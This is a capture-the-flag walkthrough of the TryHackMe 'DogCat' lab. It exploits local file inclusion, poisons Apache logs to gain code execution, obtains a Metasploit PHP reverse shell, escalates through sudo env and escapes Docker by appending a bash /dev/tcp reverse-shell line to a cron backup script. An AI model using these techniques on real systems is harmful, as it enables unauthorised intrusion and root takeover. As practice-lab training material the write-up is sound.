Today we’re going to solve another boot2root challenge called “DogCat “. It’s available at TryHackMe for penetration testing practice. This lab is of medium difficultly if we have the right basic knowledge to break the labs and are attentive to all the details we find during the reconnaissance. The credit for making this lab goes to jammy. Let’s get started and learn how to break it down successfully.
Level: Medium
Penetration Testing Methodology
Network Scanning
o Browsing HTTP Service
o Bypassing PHP Filter using Wrapper
o Reading Back-End PHP Code
o Bypassing Extension Filter
o Detecting Local File Inclusion
o Exploiting Local File Inclusion
o Reading Apache Access Logs
o Poisoning Apache Logs
o Upgrading LFI to RCE
o Getting Meterpreter on the Target Machine
o Reading Flag #1
o Enumeration for Flags
o Reading Flag #2
Privilege Escalation
o Enumerating Sudo Permissions
o Exploiting Sudo Permissions on env
o Getting Root Shell on Docker Instance
o Reading Flag #3
o Enumerating Writable Script
o Getting Reverse Shell using Script
o Reading Flag #4
To read and understand what the machine is,
we will be starting with reading the Lab Description:
“I made a website where you can look at
pictures of dogs and/or cats! Exploit a PHP application via LFI and break out
of a docker container.”
After Booting up the machine from the TryHackMe:
DogCat Page, we will be provided with a Target IP Address.
IP Address:
This room has 4 flags that we need to find to
complete the Machine.
Network Scanning
We will start with a nmap scan with -sC for
Default Scripts and -sV for Scanning Versions.
nmap -sC -sV
The Nmap Scan gives us 2 services to
enumerate. It gave us the SSH service on port 22 but unfortunately, we don’t
have a set of credentials to access the machine via SSH. Next, we have the HTTP
Service on port 80, which we will begin our enumeration with.
As we have the HTTP Service Running, it is
a good thing to check out the webpage that is hosted using a Web Browser. We
are posed with a question. What we would like to see. Being a Dog Person, we
chose Dog. It gave us such sweet pictures of Dogs that it almost made me miss
the URL changes and the view parameter with dog value.
On mere instinct, it felt like this
parameter might be injectable. Tried a bunch of different payloads. Then
finally got to LFI. When we try to browse the etc/passwd file. It gives us an
error that only dogs and cats are allowed as a value in the view parameter.
This seemed like there is some restriction.
To bypass this restriction, we tried to provide a php filter wrapper. It can be
found in the PayloadsAllTheThings
GitHub. Take the Filter and
reconfigure it to run on our target machine.
When we tried to access the dog page
through the wrapper, it returns a Base64 encoded string. Which when decoded
returns the php code for that particular file.
<img src="dogs/<?php echo
rand(1, 10); ?>.jpg" />
That means that there are 10 pics of dogs
on the server and the image fetched is at random.
Decoding to Clear Text, we can see the php
code of the index.php page. Upon close inspection, we can see that the function
adds a .php extension at the end of the URL so if we provide it with the ‘dog’ keyword it will convert it to dog.php and
when we were giving it /etc/password it was converting it into /etc/passwd.php,
Hence we need to escape this function to read files of our choice.
echo "###Base64 Encoded
Text##" | base64 -d
$ext = isset($_GET["ext"]) ?
$_GET["ext"] : '.php';
To escape the extension, we will add a
parameter as shown in the image below. Now when we try to read the /etc/passwd
file, it is directly accessible. We have successfully exploited the Local File
We have the Local File Inclusion
Vulnerability and from the nmap scan, we know that we are working with an
Apache Server. Let’s try to convert this LFI Vulnerability into a Remote Code
Execution if we can poison its logs. We have written an intensive Walkthrough
of Apache Log Poisoning Through LFI. Here, we will breeze through it. If you
want to learn more about it. Refer to the Link Below.
Log Poisoning Through LFI
First, we will try to read the access.log
file using LFI. The path for access.log is /var/log/apache2/access.log. We will
replace our /etc/passwd with this location to read the log.
Here, we can see that the log is accessible.
Now it’s time to poison it. For this, we will be needing Burp Suite. We will
capture the request using Burp Suite. Then we will manipulate the User-Agent.
We can see that Default User-Agent in the image below.
We change the User-Agent to introduce a php
code that can call on system variables to run system commands. We forward the
request to the server.
Now we will declare the c variable with
system commands to check if it worked. We will run the whoami command. As we
can observe that the response to our command was visible inside the logs. The
command we gave the server was run using www-data user.
Now that we know that we can execute
commands i.e., we have upgraded our Local File Inclusion Vulnerability to
Remote Command Execution Vulnerability.
Now we can use it to get a reverse shell on the target machine. For this,
we will craft a php based payload using Metasploit Web Delivery Exploit. It
requires basic details such as local IP Address (Make sure to give the IP
Address from VPN), local port, srvport, etc.,
use exploit/multi/script/web_delivery
set target 1
set lhost
set srvport 8081
set payload php/meterpreter/reverse_tcp
The Metasploit has crafted the payload as
per our requirement. Now we have to copy the payload and replace the whoami
command from the previous step with this payload. Please see the command
depicted below.
-d allow_url_fopen=true -r "eval(file_get_contents('',
This would result in a reverse shell
generated from the target machine to our local machine in the form of a
meterpreter shell as shown in the image below.
After getting to the meterpreter, we
convert to the bash using the shell command. We find that to use the shell effectively
we need to convert it into a TTY shell. So, we try python one-liner but the
machine doesn’t have the python installed. Then we use the basic shell TTY
command. After that, we run the whoami command to find that we have the shell
as the www-data user. We list all the files in the current directory to find a
flag.php file. Upon reading this file, we get our First Flag.
/bin/sh -i
export TERM=xterm
cat flag.php
We move to the previous directory and
listed its contents to find our Flag 2.
cd ..
cat flag2_QMW7JvaY2LvK.txt
Privilege Escalation
We have 2 Flags and now there is nothing
more to enumerate at this user level. This means now we will have to elevate
our privileges to the root level. To do this we start our enumeration by
reading the sudo permissions for the current user. This returned the env
binary. That means the current user can run env binary as root user without any
password for root.
sudo -l
(root) NOPASSWD: /usr/bin/env
Env is a part of GTFOBin, we know that
because we solved a machine that had a similar privilege escalation method.
Searching for env on GTFOBin we find that
all we need to do is execute the env command as sudo with /bin/sh as its
Upon doing so, we get a root shell in no
time. We try to look for the flag and find Flag 3 on the machine.
sudo env /bin/sh
cat flag3.txt
If we remember the Machine Description from
the Starting, we know that this is a docker instance running on the machine.
The final flag must be accessible after getting out of this instance. We go to the
root directory and list its contents. We can now confirm that this is indeed a
docker instance. We start enumerating the usual locations and we stumbled upon
a backups directory at the /opt location. The backups directory contained a
compressed file and a shell script. Upon
reading the shell script we can determine that it makes a backup on the running
webpages into a compressed file. This script may be running periodically using
a Cron Job.
cd /
ls -la
cd /opt
cd backups
We use the echo command to insert a shell
invocation command pointing towards our local machine into the backup shell
script. We can see that our shell invocation command is appended in the shell
script in the image given below.
echo "/bin/bash -c 'bash -i
>& /dev/tcp/ 0>&1'" >>
Now we start a listener at the port
mentioned inside the shell invocation command so that it can receive the
reverse shell generated. We see that the session we got is of root on the
machine. We list the contents to find the Fourth and Final Flag on the Machine.
nc -lvp 1234
cat flag4.txt
This machine was quite interesting and We
had quite fun while solving it.
Things that we learned, A quick recap.
Enumerating Parameters, Bypass PHP Filter
using Wrapper, Reading the Back-End Code, Exploiting Local File Inclusion,
Upgrading Local File Inclusion to Remote Code Execution, Getting Meterpreter,
Elevating Privilege using Sudo permissions on env, Escaping the Docker
Container using Writable Script.
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